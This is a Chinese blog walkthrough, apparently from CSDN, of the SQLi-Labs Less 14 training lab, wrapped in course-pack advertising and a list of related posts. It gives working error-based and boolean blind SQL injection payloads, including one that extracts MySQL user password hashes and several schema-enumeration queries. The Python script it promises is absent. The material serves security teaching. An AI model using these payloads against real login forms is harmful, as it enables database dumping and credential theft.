SQLi LABS Less 14 报错注入+布尔盲注_less14盲注脚本(1)

于 2024-05-17 07:34:16 发布
阅读量763 收藏 30
点赞数 13
分类专栏: 2024年程序员学习 文章标签: 网络安全 web安全 面试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84264692/article/details/138989687
版权

本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。

最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。

最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!下面就开始进入正题,如何从一个萌新一步一步进入网络安全行业。

需要体系化学习资料的朋友,可以加我V获取:vip204888 (备注网络安全)

学习路线图

其中最为瞩目也是最为基础的就是网络安全学习路线图,这里我给大家分享一份打磨了3个月,已经更新到4.0版本的网络安全学习路线图。

相比起繁琐的文字,还是生动的视频教程更加适合零基础的同学们学习,这里也是整理了一份与上述学习路线一一对应的网络安全视频教程。

网络安全工具箱

当然,当你入门之后,仅仅是视频教程已经不能满足你的需求了,你肯定需要学习各种工具的使用以及大量的实战项目,这里也分享一份我自己整理的网络安全入门工具以及使用教程和实战。

项目实战

最后就是项目实战,这里带来的是SRC资料&HW资料,毕竟实战是检验真理的唯一标准嘛~

面试题

归根结底,我们的最终目的都是为了就业,所以这份结合了多位朋友的亲身经验打磨的面试题合集你绝对不能错过!

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

第一步、判断注入点

第二步、判断报错条件

第三步、脱库

方式二:布尔盲注

第一步、判断注入条件

第二步、判断长度

第三步、枚举字符

脱库

一、功能分析

输入用户名和密码,后台接收参数查询数据库。

查询到结果,页面显示登录成功(写死的图片)

查询不到结果,页面显示登录失败(写死的图片)

二、思路分析

参数中携带双引号,页面返回报错信息,可以使用报错注入。

万能账号登录成功后,页面不会动态显示查询到的数据(返回写死的图片),不适合联合注入。

登录成功和登录失败的结果不同,可以使用布尔盲注。

三、解题步骤

方式一:报错注入

参考文章:报错注入使用详解,原理+步骤+实战教程

第一步、判断注入点

用户名输入:a"

密码随便输入:1

根据报错信息可以确定,注入点为双引号字符型注入。

第二步、判断报错条件

用户名输入:a" and updatexml(1,0x7e,3) – a

密码随便输入:1

页面返回了报错函数的内容,确定报错函数可用。

第三步、脱库

获取数据库管理员账户的密码,用户名输入:

a" and updatexml(1,
	concat(0x7e,
		substr(
		(select group_concat(user,password) 
        from mysql.user where user = 'mituan')
		,1,32)
	)
,3) -- a

其余脱库操作时,将下面圈中的地方替换为SQL语句即可:

常用的脱库语句:

# 获取所有数据库
select group_concat(schema_name)
from information_schema.schemata
 
# 获取 security 库的所有表
select group_concat(table_name)
from information_schema.tables
where table_schema='security'
 
# 获取 users 表的所有字段
select group_concat(column_name)
from information_schema.columns
where table_schema='security' and table_name='users'

方式二:布尔盲注

参考文章:布尔盲注使用详解,原理+步骤+实战教程

第一步、判断注入条件

用户名输入:a" or 1 – a

密码随便输入:1,页面正常显示(登录成功)

用户名输入:a" or 0 – a

密码随便输入:1,页面异常显示(登录失败)

由此可以确定,页面存在注入,注入点为双引号字符型注入。

第二步、判断长度

判断当前使用数据库名字的长度,是否大于1,用户名输入:

a" or length(database()) >1 -- a

长度肯定大于1,页面正常显示,确定payload可用。

从1开始递增测试长度,为提高效率,稍后使用脚本自动化猜解。

第三步、枚举字符

截取当前使用数据库名字的第一个字符,为了方便脚本测试,将字符转换为ASCLL码。

判断ASCLL码是否大于1,用户名输入:

a" or ascii(
	substr(
		(database())
	,1,1)
) >1 -- a

字符的ASCLL码肯定大于1,页面正常显示,确定payload可用。

依次判断字符的ASCLL是否等于(32~126)。

判断成功后,再按照此方法判断其他字符,为提高效率,稍后使用脚本自动化枚举。

脱库

Python自动化脚本如下,可按需修改:

学习路线:

这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。不过,要想从脚本小子变成黑客大神,这个方向越往后,需要学习和掌握的东西就会越来越多以下是网络渗透需要学习的内容:
在这里插入图片描述

需要体系化学习资料的朋友,可以加我V获取:vip204888 (备注网络安全)

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

2401_84264692
关注
  • 13
    点赞
  • 30
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs 13-14
m0_69548793的博客
07-09 474
sqli-labs 13-14
less-14 in sqli-labs
LYJ20010728的博客
01-24 151
Less-14 报错注入【 " 】 1、注入点判断:uname=admin\&passwd=Dumb You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Dumb" LIMIT 0,1' at line 1 updataxml版本 2、进行报错注入得到数据库名:uname=admin
sqli-labs-14
qq_53030229的博客
05-11 314
文章目录前言一、抓包、判断注入点二、判断回显字段三、获取数据库四、获取数据表五、获取字段六、获取用户名、密码 前言 摸鱼.......... 一、抓包、判断注入点 二、判断回显字段 其实这里只有两个回显字段的,我这里使用3只是为了让你们方便看 passwd=12123"order by 2--+ 三、获取数据库 uname=admin&passwd=12123"and exp(~(select * from (select database() ) a) )--+ 四、获取数据表 un
SQL注入】报错注入--实战示例
最新发布
m0_57347472的博客
03-20 465
mysql5.1版本及以上版本,会存在一个叫infromation_schema的默认数据库,这个数据库里面记录着整个mysql管理的数据库的名称、表名、列名(字段名)infromation_schema中的columns存的是所有的库的所有表的列的字段名信息。infromation_schema中的tables表存了各个数据库中有的表的表名。k这个字母是随便写的,写啥都行,ox7e是16进制,表示~,也可以直接写“~”若反馈错误表示只能显示一行,所以可以采用limit来一行一行显示,查看报错。
SQL注入之报错盲注(墨者学院)
waxcj的博客
05-02 2863
首先我们先来了解一下报错注入的基本概念 1:报错注入定义 报错注入就是利用了数据库的某些机制,人为地制造错误条件,使得查询结果能够出现在错误信息中。 2:报错注入前提 页面上没有回显点,但是必须有SQL语句执行错误的信息。 3:报错注入优缺点 优点:不需要显示位,如果有显示位建议使用union联合查询。 缺点:需要有SQL语句的报错信息。 4:构造报错注入的基本步骤 构造目标查询语句 选择报错注入函数 构造报错注入语句 拼接报错注入语句 5:常见的报错注入函数 updatexml(
sqli-labs通关全解---关于盲注脚本的编写--less7-10-4
cyynid的博客
01-10 561
盲注
sql注入 自学笔记 报错注入 二阶注入 布尔时间盲注 基于sqli-labs
02-19
下面是基于SQLi-Labs的SQL注入基础知识点: 一、报错注入 报错注入是指攻击者通过构造特定的SQL语句,让攻击者想要查询的信息通过页面的错误提示回显出来。报错注入一般需要具备两个前提条件: 1. Web应用程序未...
sqlilabs过关手册注入天书,过关sqlliabs的绝佳手册
06-28
Sqli-labs安装需要安装以下环境 apache+mysql+php Sqli-labs安装 将之前下载的源码解压到web目录下,linux的apache为 /var/www/html下,windows下的wamp解压在www目录下。 修改sql-connections/db-creds.inc文件当中...
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例.doc
07-09
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例 本文档主要讲解了如何结合手工注入编写一个SQL盲注脚本,以SQLi-Labs less16为例。整个过程可以分为两部分:分析测试注入点和获取数据库名编写脚本。 ...
sqli-labs PoC 脚本.rar
08-09
sqli-labs 使用到的脚本 课程有:Less01,Less05的爆破数据库+...具体涉及:报错型注入,报错型盲注布尔盲注,延时型盲注,POST数据盲注。 资料参考:https://blog.csdn.net/Kevinhanser/article/details/81215985
mysql注入-sqlilabs靶场注入
10-15
sqlilabs靶场全部关卡的详细解析,pdf文档
【详细】 Sqli-labs1~65关 通关详解 解题思路+解题步骤+解析
热门推荐
Jay17的博客
08-03 2万+
【详细】 Sqli-labs1~65关 通关详解 解题思路+解题步骤+解析 详细,超级详细
sqli-labs-less-13 post传参+布尔盲注
yzcn
11-12 299
Less-13 post+布尔盲注 首先通过burp suite抓包获取报文体: 利用harkbar插件进行注入: 判断闭合方式: uname=’)or 1=1 #&passwd=&submit=Submit 发现闭合方式为(‘’) uname=’))#&passwd=&submit=Submit 本关卡没有回显,只有正误判断和报错信息,我们可以使用布尔盲注、延时注入或者报错注入,这里我么使用报注入。 判断字段列数: uname=’) group by 3 #&
sqli-labs第十三和十四关(post请求-报错盲注)
qq_42266432的博客
08-24 628
一上来,先加个单引号探探路,有sql报错回显 在单引号后继续加上and 1,试图让sql报错显示更多信息,从near ‘’) and password=(‘1’) LIMIT 0,1’ at line 1可以判断,这关就用单引号加括号了,没什么意思 注入’)却发现,页面没有回显,于是这里考虑使用报错盲注或者布尔盲注,时间延时说不定也行,先采用报错盲注吧 先使用order by 拆解出字段数为2 爆出当前数据库 uname=uname=1') and 1 union select 1,updatex.
Sqli-labs 复习 Less13-14 报错型盲注 - POST
kevinhanser
08-11 394
之前学习了一遍 sqli-labs,这是巩固复习一遍,代码全部手敲,加深印象 Sqli-labs 博客目录 报错型 SQL 盲注 函数讲解 盲注用到的函数 rand() 产生一个不固定的0~1的随机数列,加了参数之后会变成固定的伪随机数列 rand(0),rand(1),当使用一个整数参数时,rand使用该参数作为种子生成一个固定的伪随机数列 floor 向下取整 ...
Sqli-labs之Less-13和Less-14
→_→
04-05 1133
Less-13 POST单引号变形双注入 由题意可知,有单引号闭合的问题,所以在输入框中分别输入 1' 和 1,看返回结果: 报错,从信息中得知还有一个小括号,测试 1') or 1=1 -- # 登录成功发现不在返回用户名和密码信息。 从以上的信息中...
SQL注入之路之三:报错注入
weixin_62715196的博客
08-10 320
主要简述什么是报错注入报错注入常用函数,报错注入原理以及如何使用爆破注入获取用户敏感信息
网络安全SQL注入--报错注入
边缘拼命划水的小陈
04-06 765
报错注入:利用sql语句的不规范,获取相关sql提示信息。
sqlilabs靶场搭建报错
10-07
靶场搭建报错可能有多种原因,根据提供的引用内容,主要有两个可能的原因。第一个原因是sqli-labs文件夹没有正确解压到phpstudy_pro\WWW目录下,并且没有更名为sqli。请确保sqli-labs-master.zip已经解压到了正确的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值